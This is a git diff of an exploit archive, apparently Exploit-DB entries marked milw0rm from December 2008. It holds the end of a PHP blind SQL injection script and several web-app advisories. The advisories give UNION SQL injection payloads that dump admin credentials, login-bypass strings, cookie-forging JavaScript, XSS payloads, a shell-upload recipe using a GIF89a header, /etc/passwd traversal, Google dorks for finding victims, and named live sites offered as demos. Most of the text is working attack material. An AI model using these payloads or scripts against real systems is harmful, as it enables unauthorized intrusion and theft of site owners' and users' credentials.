-2 http://www.site.com english 8 8 45001 liste9.html +# +############################################################### +'); + $automatic = $argv[1]; + $url = $argv[2]; + if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) { + if ($argv[1] == "-1") { + $source = file_get_contents($url."/index.html"); + $buffer = $source; + if (strpos($source,"a href='$url/") != 0) { + $place = strpos($source,"a href='$url/"); + $sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/")); + $urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'")); + } else { + while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") { + $buffer = substr($buffer,strpos($buffer,"a href='/")); + } + $place = strpos($buffer, "a href='/"); + $sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/")); + $urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'")); + } + $varstart = strpos($urlpart,$sprache)+strlen($sprache)+1; + $injplace = strpos(substr($urlpart,$varstart),"/") + $varstart; + $part1 = substr($urlpart,0,$injplace); + $part2 = substr($urlpart,$injplace); + } elseif ($argv[1] == "-2") { + $part1 = $url."/".$argv[3]."/".$argv[4]; + $part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7]; + } + echo "\nExploiting now!\n\n"; + $true = file_get_contents($part1."+and+1=1".$part2); + $false = file_get_contents($part1."+and+1=0".$part2); + $inj = $false; + $tbl = array("benutzer","passwort"); + if (strlen($false) != strlen($true)) { + for ($mode = 0; $mode <= 1; $mode++) { + echo $tbl[$mode].": "; + while ($break == 0) { + $count++; + $injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2); + $injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2); + $injpart3 = 
file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2); + $injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2); + $injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2); + if (strlen($false) / strlen($injpart1) * 100 < 98) { + if (strlen($false) / strlen($injpart2) * 100 < 98) { + $border1 = 103; + $border2 = 122; + } else { + $border1 = 96; + $border2 = 108; + } + } + if (strlen($false) / strlen($injpart3) * 100 < 98) { + if (strlen($false) / strlen($injpart4) * 100 < 98) { + if (strlen($false) / strlen($injpart5) * 100 < 98) { + $border1 = 47; + $border2 = 57; + } else { + $border1 = 59; + $border2 = 69; + } + } else { + $border1 = 70; + $border2 = 96; + } + } + for ($i = $border1; $i<=$border2; $i++) { + $zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2); + if (strlen($false) / strlen($zero) * 100 < 98) { + $break = 1; + echo "\n"; + $i = $border2+1; + } else { + $inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2); + if ((strlen($inj) / strlen($true) * 100) < 98) { + echo chr($i); + $i = $border2+1; + } + } + } + } + $break = 0; + $count = 0; + } + } + } else { + echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n"; + } +?> + +# milw0rm.com [2008-12-16] diff --git a/platforms/php/webapps/7493.txt b/platforms/php/webapps/7493.txt index 42d8b32db..a78156ab8 100755 --- a/platforms/php/webapps/7493.txt +++ b/platforms/php/webapps/7493.txt 
@@ -1,31 +1,31 @@
-Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities
-
-author : Cold z3ro, www.hackteach.org
-
-Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem"
-
-==============
-[#] SQL Injection
-
-http://www.site.com/[path]/forgotpass.asp
-
- In uid insert SQL command's =>
-
-SCMD ==> ' or '1=1
-SCMD ==> ' or 'update tblusers set password = "z3ro"
-
-
-all passwords will be z3ro
-
-=============
-[#] Database Disclosure
-
-http://www.site.com/[path]/db/helpdesk2000.mdb
-
-
-
-example :
-https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb
-http://www.ags2.com/helpdesk/db/helpdesk2000.mdb
-
-# milw0rm.com [2008-12-16]
+Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities
+
+author : Cold z3ro, www.hackteach.org
+
+Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem"
+
+==============
+[#] SQL Injection
+
+http://www.site.com/[path]/forgotpass.asp
+
+ In uid insert SQL command's =>
+
+SCMD ==> ' or '1=1
+SCMD ==> ' or 'update tblusers set password = "z3ro"
+
+
+all passwords will be z3ro
+
+=============
+[#] Database Disclosure
+
+http://www.site.com/[path]/db/helpdesk2000.mdb
+
+
+
+example :
+https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb
+http://www.ags2.com/helpdesk/db/helpdesk2000.mdb
+
+# milw0rm.com [2008-12-16]
diff --git a/platforms/php/webapps/7494.txt b/platforms/php/webapps/7494.txt
index 86ccc4754..f42bae492 100755
--- a/platforms/php/webapps/7494.txt
+++ b/platforms/php/webapps/7494.txt
@@ -1,66 +1,66 @@
-[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns.
-[~]
-[~] script: http://www.zeltatrade.com/
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Date: 16/12/2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] -----------------------------------------------------------
-
-exp for demo: (R-SQL)
-
-user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
-
-pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
-
-
-exp for demo: (B-SQL)
-
-http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
-
-http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
-
-
-exp for demo: (auth bypass)
-
-http://joineazy.com/members/login.asp
-
-username: trt-turk@hotmail.com
-
-pass: ' or '
-
-
-exp for demo: (admin bypass)
-
-http://joineazy.com/embadmin/admin_main.asp
-
-http://joineazy.com/embadmin/site_setup.asp
-
-http://joineazy.com/embadmin/main_baseimage.asp
-
-
-exp for demo: (RFU)
-
-firs you register to site
-
-login to site and edit your pictures select your shell.asp
-
-go your shell asp:
-
-http://joineazy.com/members/member_pictures/shell.asp
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-12-16]
+[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns.
+[~]
+[~] script: http://www.zeltatrade.com/
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Date: 16/12/2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] -----------------------------------------------------------
+
+exp for demo: (R-SQL)
+
+user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
+
+pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
+
+
+exp for demo: (B-SQL)
+
+http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
+
+http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
+
+
+exp for demo: (auth bypass)
+
+http://joineazy.com/members/login.asp
+
+username: trt-turk@hotmail.com
+
+pass: ' or '
+
+
+exp for demo: (admin bypass)
+
+http://joineazy.com/embadmin/admin_main.asp
+
+http://joineazy.com/embadmin/site_setup.asp
+
+http://joineazy.com/embadmin/main_baseimage.asp
+
+
+exp for demo: (RFU)
+
+firs you register to site
+
+login to site and edit your pictures select your shell.asp
+
+go your shell asp:
+
+http://joineazy.com/members/member_pictures/shell.asp
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-12-16]
diff --git a/platforms/php/webapps/7497.txt b/platforms/php/webapps/7497.txt
index f76a419d9..6aa10db52 100755
--- a/platforms/php/webapps/7497.txt
+++ b/platforms/php/webapps/7497.txt
@@ -1,96 +1,96 @@ -[START] - -######################################################################################### -[0x01] Informations: - -Script : RSMScript 1.21 -Download : http://www.hotscripts.com/jump.php?listing_id=78547&jump_type=1 -Vulnerability : Insecure Cookie Handling / XXS -Author : Osirys -Contact : osirys[at]live[dot]it -Website : http://osirys.org -Notes : Proud to be Italian -Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX - -######################################################################################### -[0x02] Bug: [Insecure Cookie Handling] -###### - -Bugged file is: /[path]/verify.php - -[CODE] - -if($admin_pass == $code) -{ - setcookie("verified", "null", time()+1800); - header( 'refresh: 0; url=update.php' ); -} - -[/CODE] - -As we can see, if the password "$code" typed is the same of $admin_pass, so you log in, -cookie is set with the name "verified" and with content "null". So, a malicious user -can just set up a cookie with that name and value, and then he will be logged as the -admin. - -[!] FIX: A fix could be to put as a content or cookie name the password. Example: - -[CODE] setcookie("verified", "$admin_pass", time()+1800); [/CODE] - - -[!] EXPLOIT: javascript:document.cookie = "verified=null; path=/"; - -######################################################################################### -[0x03] Bug: [XSS] -###### - -To exploit this bug, we must be logged in. Just bypass the login with the Cookie ;) -There are two bugged file. - -1) /[path/submit.php - In this file, we can put arbitrary data into a .txt file. - - [CODE] - - $quote = $_REQUEST['quote']; - $writePage = fopen('quotes.txt', 'a') or die("can't open file"); - fwrite($writePage, "\t"); - fwrite($writePage, stripslashes($quote)); - fclose($writePage); - - [/CODE] - - [!] FIX: Just filter direct user input. - - -2) /path/update.php - This file gets quotes.txt content, and print it directly into html code. 
- In 1) we saw that we can put arbitrary data into this .txt file. Just - Put js code ;) - - [CODE] - - $quotes = file_get_contents("quotes.txt"); - $quotes= preg_split("/[\t]+/", $quotes); - $i = 0; - $noQuotes = sizeOf($quotes); - while ($i < $noQuotes) - { - $quote = $quotes[$i]; - echo '<option value='.$i.'>'.$quote.'</option>'; - $i = $i + 1; - } - - [/CODE] - - [!] FIX: A fix could be just to filter input before being printed in html code. - - -## How to exploit this bugs? - -[!] EXPLOIT: /[path]/submit.php?quote=<script>alert("XSS")</script> - -######################################################################################### -[/END] - -# milw0rm.com [2008-12-17] +[START] + +######################################################################################### +[0x01] Informations: + +Script : RSMScript 1.21 +Download : http://www.hotscripts.com/jump.php?listing_id=78547&jump_type=1 +Vulnerability : Insecure Cookie Handling / XXS +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + +######################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/verify.php + +[CODE] + +if($admin_pass == $code) +{ + setcookie("verified", "null", time()+1800); + header( 'refresh: 0; url=update.php' ); +} + +[/CODE] + +As we can see, if the password "$code" typed is the same of $admin_pass, so you log in, +cookie is set with the name "verified" and with content "null". So, a malicious user +can just set up a cookie with that name and value, and then he will be logged as the +admin. + +[!] FIX: A fix could be to put as a content or cookie name the password. Example: + +[CODE] setcookie("verified", "$admin_pass", time()+1800); [/CODE] + + +[!] 
EXPLOIT: javascript:document.cookie = "verified=null; path=/"; + +######################################################################################### +[0x03] Bug: [XSS] +###### + +To exploit this bug, we must be logged in. Just bypass the login with the Cookie ;) +There are two bugged file. + +1) /[path/submit.php + In this file, we can put arbitrary data into a .txt file. + + [CODE] + + $quote = $_REQUEST['quote']; + $writePage = fopen('quotes.txt', 'a') or die("can't open file"); + fwrite($writePage, "\t"); + fwrite($writePage, stripslashes($quote)); + fclose($writePage); + + [/CODE] + + [!] FIX: Just filter direct user input. + + +2) /path/update.php + This file gets quotes.txt content, and print it directly into html code. + In 1) we saw that we can put arbitrary data into this .txt file. Just + Put js code ;) + + [CODE] + + $quotes = file_get_contents("quotes.txt"); + $quotes= preg_split("/[\t]+/", $quotes); + $i = 0; + $noQuotes = sizeOf($quotes); + while ($i < $noQuotes) + { + $quote = $quotes[$i]; + echo '<option value='.$i.'>'.$quote.'</option>'; + $i = $i + 1; + } + + [/CODE] + + [!] FIX: A fix could be just to filter input before being printed in html code. + + +## How to exploit this bugs? + +[!] EXPLOIT: /[path]/submit.php?quote=<script>alert("XSS")</script> + +######################################################################################### +[/END] + +# milw0rm.com [2008-12-17] diff --git a/platforms/php/webapps/7500.txt b/platforms/php/webapps/7500.txt index 3ff923ebb..7ecb79269 100755 --- a/platforms/php/webapps/7500.txt +++ b/platforms/php/webapps/7500.txt 
@@ -1,31 +1,31 @@ -## Script Name: Shopsysteme (new version oscommerce) - -## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro) :) - -## Author: mNt - -## File Upload Bug - -## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme için yaklaşık 32.900 sonuçtan 191 - 200 arası sonuçlar (0,51 saniye)] - -## Use: - -http://www.example.com/ - -after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php - -File uploaded php shell - -after in url: http://www.example.com/images/upload/mNt.php - -Attention: Shell Code İn GIF89;a - -## Live demo: http://www.trampleandfetish.de/admin/editor/image.php - -## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php - -## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage - -## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net - -# milw0rm.com [2008-12-17] +## Script Name: Shopsysteme (new version oscommerce) + +## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro) :) + +## Author: mNt + +## File Upload Bug + +## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme için yaklaşık 32.900 sonuçtan 191 - 200 arası sonuçlar (0,51 saniye)] + +## Use: + +http://www.example.com/ + +after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php + +File uploaded php shell + +after in url: http://www.example.com/images/upload/mNt.php + +Attention: Shell Code İn GIF89;a + +## Live demo: http://www.trampleandfetish.de/admin/editor/image.php + +## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php + +## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage + +## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net + +# milw0rm.com [2008-12-17] 
diff --git a/platforms/php/webapps/7504.txt b/platforms/php/webapps/7504.txt
index 6773c087f..c58d6c0aa 100755
--- a/platforms/php/webapps/7504.txt
+++ b/platforms/php/webapps/7504.txt
@@ -1,53 +1,53 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<<!>> Found by : Cyb3r-1sT - -<<!>> C0ntact : cyb3r-1st [at] hotmail.com - -<<!>> Groups : InjEctOr5 T3am - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> - - :>>> http://www.site.me/index.php?option=com_tech_article&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users--&task=item - - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= - -<<->> All freinds , all muslims , str0ke - -side note: -<name>tech_article</name> -<creationDate>3-23-2006</creationDate> -<author>Anthony Ferrara</author> -<copyright>GPL</copyright> -<authorEmail>ircmaxell@yahoo.com</authorEmail> -<authorUrl>www.ircmaxell.com</authorUrl> -<version>1.0.1</version> -<description>Tech Article Component For Joomla</description> - -# milw0rm.com [2008-12-17] + + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<<!>> Found by : Cyb3r-1sT + +<<!>> C0ntact : cyb3r-1st [at] hotmail.com + +<<!>> Groups : InjEctOr5 T3am + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> + + :>>> http://www.site.me/index.php?option=com_tech_article&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users--&task=item + + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ +======================================================= + +<<->> All freinds , all muslims , str0ke + +side note: +<name>tech_article</name> +<creationDate>3-23-2006</creationDate> +<author>Anthony Ferrara</author> +<copyright>GPL</copyright> +<authorEmail>ircmaxell@yahoo.com</authorEmail> +<authorUrl>www.ircmaxell.com</authorUrl> +<version>1.0.1</version> +<description>Tech Article Component For Joomla</description> + +# milw0rm.com [2008-12-17] diff --git a/platforms/php/webapps/7509.txt b/platforms/php/webapps/7509.txt index d2ceb41c1..f1ba149ce 100755 --- a/platforms/php/webapps/7509.txt +++ b/platforms/php/webapps/7509.txt 
@@ -1,23 +1,23 @@ -######################################################### ---------------------------------------------------------- -Portal Name: Mini File Host -Version: All version -Vendor : http://www.galaxyscripts.com -Dork: inurl:index.php?page=img Powered By Mini File Host -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Vulnerability : (Uploader Bypass) ---------------------------------------------------------- -######################################################### -[Mime Check Bypass]: -create a file called name.php and fill it as below: ----------- -GIF89aP; -[shell] ----------- -Save and upload ! - -[Video]: -http://pouya2006.persiangig.com/UploadVideo/minifile.rar ---------------------------------- - -# milw0rm.com [2008-12-18] +######################################################### +--------------------------------------------------------- +Portal Name: Mini File Host +Version: All version +Vendor : http://www.galaxyscripts.com +Dork: inurl:index.php?page=img Powered By Mini File Host +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Vulnerability : (Uploader Bypass) +--------------------------------------------------------- +######################################################### +[Mime Check Bypass]: +create a file called name.php and fill it as below: +---------- +GIF89aP; +[shell] +---------- +Save and upload ! + +[Video]: +http://pouya2006.persiangig.com/UploadVideo/minifile.rar +--------------------------------- + +# milw0rm.com [2008-12-18] diff --git a/platforms/php/webapps/7513.txt b/platforms/php/webapps/7513.txt index 903508dfb..118a9bba9 100755 --- a/platforms/php/webapps/7513.txt +++ b/platforms/php/webapps/7513.txt 
@@ -1,53 +1,53 @@ -[START] - -######################################################################################### -[0x01] Informations: - -Script : Calendar Script v1.1 -Download : http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1 -Vulnerability : Insecure Cookie Handling -Author : Osirys -Contact : osirys[at]live[dot]it -Website : http://osirys.org -Notes : Proud to be Italian -Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX - - -######################################################################################### -[0x02] Bug: [Insecure Cookie Handling] -###### - -Bugged file is: /[path]/index.php - -[CODE] - -if(mysql_num_rows($checkDetails) > 0) { - setcookie('nodstrumCalendarV2', '1', time()+3600); // Cookie will expire in 1 hour. - // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>'; -} - -[/CODE] - -If we login in correctly, a cookie is created with 'nodstrumCalendarV2' as name and -'1' as content. - -## [!] FIX: Change name or content to the cookie. Example: - -[CODE] - -if(mysql_num_rows($checkDetails) > 0) { - setcookie('nodstrumCalendarV2', '$password', time()+3600); // Cookie will expire in 1 hour. - // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>'; -} - -[/CODE] - - -### [!] 
EXPLOIT: javascript:document.cookie = "nodstrumCalendarV2=1; path=/"; - - -######################################################################################### - -[/END] - -# milw0rm.com [2008-12-18] +[START] + +######################################################################################### +[0x01] Informations: + +Script : Calendar Script v1.1 +Download : http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1 +Vulnerability : Insecure Cookie Handling +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +######################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/index.php + +[CODE] + +if(mysql_num_rows($checkDetails) > 0) { + setcookie('nodstrumCalendarV2', '1', time()+3600); // Cookie will expire in 1 hour. + // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>'; +} + +[/CODE] + +If we login in correctly, a cookie is created with 'nodstrumCalendarV2' as name and +'1' as content. + +## [!] FIX: Change name or content to the cookie. Example: + +[CODE] + +if(mysql_num_rows($checkDetails) > 0) { + setcookie('nodstrumCalendarV2', '$password', time()+3600); // Cookie will expire in 1 hour. + // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>'; +} + +[/CODE] + + +### [!] EXPLOIT: javascript:document.cookie = "nodstrumCalendarV2=1; path=/"; + + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-18] diff --git a/platforms/php/webapps/7514.txt b/platforms/php/webapps/7514.txt index 6732b0a01..666bbef3e 100755 --- a/platforms/php/webapps/7514.txt +++ b/platforms/php/webapps/7514.txt 
@@ -1,40 +1,40 @@ -####################################################### -I-Rater Basic(messages.php) SQL-injection. -####################################################### - -################################################### -#[~] Author : boom3rang -#[~] Kosova Hackers Group [www.khg-crew.ws] -#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. - - -#[!] Script Name: I-Rater Basic -#[!] Home Page: http://www.i-rater.com -#[!] Google_Dork: N/A -################################################### - - - - - -#[~] Example: -http://localhost/Path/messages.php?idp=[exploit] - -#[~]Exploit: --9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin-- - - -#[!] Live Demo -http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin-- - - -#[!] Note -To see the information go View Sources/Search "large.php?id=" ;). - -############################## -#[!] Proud 2 be Albanian -#[!] Proud 2 be Muslim -#[!] United States of Albania -############################## - -# milw0rm.com [2008-12-18] +####################################################### +I-Rater Basic(messages.php) SQL-injection. +####################################################### + +################################################### +#[~] Author : boom3rang +#[~] Kosova Hackers Group [www.khg-crew.ws] +#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. + + +#[!] Script Name: I-Rater Basic +#[!] Home Page: http://www.i-rater.com +#[!] Google_Dork: N/A +################################################### + + + + + +#[~] Example: +http://localhost/Path/messages.php?idp=[exploit] + +#[~]Exploit: +-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin-- + + +#[!] Live Demo +http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin-- + + +#[!] 
Note +To see the information go View Sources/Search "large.php?id=" ;). + +############################## +#[!] Proud 2 be Albanian +#[!] Proud 2 be Muslim +#[!] United States of Albania +############################## + +# milw0rm.com [2008-12-18] diff --git a/platforms/php/webapps/7515.txt b/platforms/php/webapps/7515.txt index ba8654a3d..aaf6627f8 100755 --- a/platforms/php/webapps/7515.txt +++ b/platforms/php/webapps/7515.txt 
@@ -1,52 +1,52 @@ -Phpclanwebsite <= 1.23.3 Fix Pack #5 (File Including/SQL/XSS) Multiple Remote Vulnerabilities - -The description: -The set vulnerability in CMS Phpclanwebsite versions 1.23.3 Fix Pack #5 and more low was revealed. - -1. Multiple File Including Vulnerabilities - -Vulnerability exists for the reason that direct access to some files, around logicians of work of the appendix is possible. -It gives the chance to redefine internal variables which are transferred as arguments in function include (). -Examples of vulnerable files: -/theme/superchrome/box.php?boxname=../../../../../etc/passwd%00 -/phpclanwebsite/footer.php?theme=../../../../../etc/passwd%00 -etc - -The note: -For vulnerability operation the following options PHP are required: register_globals=On and magic_quotes_gpc=Off - -2. Multiple SQL Injection Vulnerabilities - -The appendix everywhere does not check the variables transferred from outside of the user. It allows to carry out any SQL Injection. -Examples of vulnerable files: -SQL Injection (insert) - - /index.php?page='SQL -SQL Injection (delete) - - /index.php?page=processforms&ok=1&SP=1&form_id=2 - , where "form_id" the identifier of the deleted user -SQL Injection (select) - - /index.php?page=login - POST:pcwlogin='SQL&pcw_pass='SQL - - /index.php?page=login - POST:pcwlogin=1'+OR+1=1--&pcw_pass=1 - -SQL Injection (select) - - /index.php?page=downloads&func=search - POST:searchvalue='SQL&whichfield=SQL - - /index.php?page=downloads&func=search - POST:searchvalue=1&whichfield=dl_name>1)+limit+0+union+select+tag,2,3,login,5,6,7,email,9,password,11,12,13,14,15+from+cws_members-- -etc - -The note: -For operation of all SQL Injection vulnerabilities, except vulnerability in parametre "whichfield", are required disconnected magic_quotes_gpc. - -3. Multiple Cross-site Scripting Vulnerabilities - -The appendix everywhere does not check the variables transferred from outside of the user. 
It allows to carry out any code in a context of a user browser. -Examples of vulnerable files: -/index.php?page='><script>alert('XSS')</script> -etc - -# milw0rm.com [2008-12-18] +Phpclanwebsite <= 1.23.3 Fix Pack #5 (File Including/SQL/XSS) Multiple Remote Vulnerabilities + +The description: +The set vulnerability in CMS Phpclanwebsite versions 1.23.3 Fix Pack #5 and more low was revealed. + +1. Multiple File Including Vulnerabilities + +Vulnerability exists for the reason that direct access to some files, around logicians of work of the appendix is possible. +It gives the chance to redefine internal variables which are transferred as arguments in function include (). +Examples of vulnerable files: +/theme/superchrome/box.php?boxname=../../../../../etc/passwd%00 +/phpclanwebsite/footer.php?theme=../../../../../etc/passwd%00 +etc + +The note: +For vulnerability operation the following options PHP are required: register_globals=On and magic_quotes_gpc=Off + +2. Multiple SQL Injection Vulnerabilities + +The appendix everywhere does not check the variables transferred from outside of the user. It allows to carry out any SQL Injection. +Examples of vulnerable files: +SQL Injection (insert) - + /index.php?page='SQL +SQL Injection (delete) - + /index.php?page=processforms&ok=1&SP=1&form_id=2 + , where "form_id" the identifier of the deleted user +SQL Injection (select) - + /index.php?page=login + POST:pcwlogin='SQL&pcw_pass='SQL + + /index.php?page=login + POST:pcwlogin=1'+OR+1=1--&pcw_pass=1 + +SQL Injection (select) - + /index.php?page=downloads&func=search + POST:searchvalue='SQL&whichfield=SQL + + /index.php?page=downloads&func=search + POST:searchvalue=1&whichfield=dl_name>1)+limit+0+union+select+tag,2,3,login,5,6,7,email,9,password,11,12,13,14,15+from+cws_members-- +etc + +The note: +For operation of all SQL Injection vulnerabilities, except vulnerability in parametre "whichfield", are required disconnected magic_quotes_gpc. + +3. 
